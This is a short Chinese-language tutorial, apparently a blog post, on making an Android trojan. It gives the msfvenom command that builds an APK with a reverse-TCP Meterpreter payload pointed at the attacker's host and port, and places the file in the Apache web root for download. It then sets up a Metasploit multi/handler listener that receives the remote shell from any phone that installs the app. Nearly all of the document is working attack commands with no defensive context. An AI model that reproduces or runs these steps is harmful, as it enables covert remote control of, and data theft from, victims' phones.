1、配置安卓木马程序

msfvenom -p android/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545 R > /var/www/html/Lliang.apk

LHOST对应的是本机的ip地址

LPORT对于你要监听的端口

/var/www/html是生成木马的路径,也是kali 2.0的web服务器路径

接着在终端里输入/etc/init.d/apache2 start 启动apache服务

2、启动MSF来加载模块

启动服务 msfconsole

设置payload

use exploit/multi/handler加载模块

set payload android/meterpreter/reverse_tcp 选择Payload

show option查看参数设置

注意要把LHOST 和LPORT 设置成刚才配置木马程序的IP和端口

确认无误后,便可以开始监听,使用 exploit

之后攻击便完成了,这时候返回一个meterpreter可以执行各种命令,可以通过’?‘来进行辅助获得更多的帮助信息。

Logo

为开发者提供学习成长、分享交流、生态实践、资源工具等服务,帮助开发者快速成长。

更多推荐